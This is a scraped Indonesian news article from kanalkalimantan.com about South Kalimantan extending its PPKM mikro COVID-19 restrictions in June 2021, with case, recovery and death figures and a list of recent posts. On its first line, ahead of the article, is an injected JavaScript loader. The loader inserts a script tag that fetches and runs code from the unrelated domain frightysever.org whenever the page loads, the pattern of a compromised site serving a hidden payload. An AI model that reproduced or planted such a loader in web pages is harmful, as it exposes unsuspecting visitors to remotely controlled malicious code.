(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,'script','https://frightysever.org/Bgkc244P');
Kalimantan Selatan

Perpanjang PPKM Selama Dua Pekan, Ini Angka Positif Covid-19 di Kalsel


KANALKALIMANTAN.COM BANJARMASIN – Berdasarkan data Satgas Percepatan Penanganan Covid-19 Kalsel angka kasus positif Covid-19 dinyatakan cenderung stagnan setelah berakhirnya bulan suci Ramadan dan Hari Raya Idul Fitri.

“Kecuali tanggal 24 Mei dengan jumlah kasus yang lumayan tinggi. Namun, beberapa hari terakhir kembali angka menjadi datar,” ujar Pj Gubernur Kalsel, Safrizal ZA, setelah memimpin  rapat koordinasi situasi Covid-19 di Kalsel sekaligus evaluasi PPKM mikro.

Dalam rapat ini turut mengundang Satgas Covid-19 Kalsel dari Kepala Dinas Kesehatan Provinsi Kalsel, Kepala BPBD, serta tim pakar masing-masing bidang.

Berdasarkan data Satgas Covid-19, Kamis (3/6/2021) kemarin, terjadi penambahan 56 kasus terkonfirmasi. Ditambah lagi angka kematian akibat virus corona juga kembali merangkak, dengan penambahan 2 kasus.

Baca juga: RESMI. PPKM di Kalsel Kembali Diperpanjang

Sementara itu, Satgas Covid-19 Kalsel melaporkan ada 42 pasien telah dinyatakan sembuh.

Kendati demikian, Safrizal menyatakan, perkembangan kasus positif Covid-19 di Kalsel masih landai. Ia menegaskan pihaknya tidak ingin lengah. “Kita harapkan angka ini bisa kita turunkan dengan terus menyosialisasikan protokol kesehatan di semua aktivitas masyarakat,” katanya.

Sebagai salah satu upaya menekan laju penyebaran Covid-19, Pemprov Kalsel akhirnya memutuskan untuk kembali menetapkan perpanjangan Pemberlakukan Pembatasan Kegiatan Masyarakat (PPKM) mikro. “Provinsi Kalsel memperpanjang PPKM mikro untuk dua minggu ke depan agar terus mempertahankan sekaligus berupaya menurunkan indikator utama,” ujar Safrizal.

Wakasatgas Covid-19 nasional ini menerangkan, indikator utama ialah angka positif. Berdasarkan data terkini, jumlah kasus positif di Banua sebanyak 2,7 persen, masih di bawah dari angka rata-rata nasional.

Sementara itu, Kepala Dinas Kesehatan Provinsi Kalsel, Muslim, mengapresiasi keberadaan PPKM mikro sebagai kebijakan antisipatif.

“PPKM mikro itu sudah berjalan beberapa periode, tapi Kalsel tetap mengikuti. Kami sangat terima kasih dengan kebijakan antisipatif yang dilakukan, apakah itu surat keputusan, edaran, dan sebagainya,” ujarnya.

Baca juga: Simulasi PTM di Banjarbaru, Sekolah Dibuka Kembali 12 Juli 2021

Adapun tim satgas Covid-19 Provinsi Kalsel baru saja mengalami revitalisasi. Komposisi tim dan beberapa struktur diubah demi mempertajam fokus dan penanganan. Selain itu, ada penambahan bidang baru, yakni perlindungan terhadap Nakes, yang diketuai oleh DR dr Mohammad Rudiansyah.

Hingga saat ini, total kasus Covid-19 di Kalsel telah menyentuh angka 34.870 kasus. Sementara jumlah kasus kematian akibat infeksi virus telah mencapai 1.023 kasus. (kanalkalimantan.com/dewi)

Reporter : dewi
Editor : bie


Al Ghifari

Recent Posts

Hidup Makin Tenang, Hadapi Risiko dengan Asuransi Pelita dari BRI Life

KANALKALIMANTAN.COM, - Asuransi merupakan salah satu bentuk perlindungan yang perlu dimiliki setiap orang. Dengan memiliki… Read More

9 jam ago

10 Mei Hari Lupus Sedunia, Yuk Kenali Penyakit Lupus

KANALKALIMANTAN.COM - Peringatan Hari Lupus Sedunia ini diadakan pada tanggal 10 Mei setiap tahunnya. Hari… Read More

9 jam ago

Teror Buaya Muara di Pelambuan, Warga Diminta Jauhi Sungai

KANALKALIMANTAN.COM, BANJARMASIN - Buaya yang kerap muncul di Sungai Pelambuan, Kecamatan Banjarmasin Barat, Kota Banjarmasin,… Read More

9 jam ago

Satgas Distribusi Material ke Lokasi TMMD Desa Sungai Karias

KANALKALIMANTAN.COM, AMUNTAI - Pelaksaanan program TNI Manunggal Membangun Desa (TMMD) ke-120 Kodim 1001/HSU-BLG di Desa… Read More

13 jam ago

Yakin ‘Pemilik’ 13 Kursi Golkar, Acil Odah Lamar Nasdem Koalisi di Pilgub Kalsel

KANALKALIMANTAN.COM, BANJARBARU - Hj Raudatul Jannah atau Acil Odah siap ramaikan kontestasi Pemilihan Kepala Daerah… Read More

16 jam ago

Musrenbang RPJPD 2025-2045, Bahas Rencana Program HSU 20 Tahun ke Depan

KANALKALIMANTAN.COM, AMUNTAI - Pemerintah Kabupaten Hulu Sungai Utara melaksanakan Musyawarah Perencanaan Pembangunan (Musrenbang) Rencana Pembangunan… Read More

16 jam ago

This website uses cookies.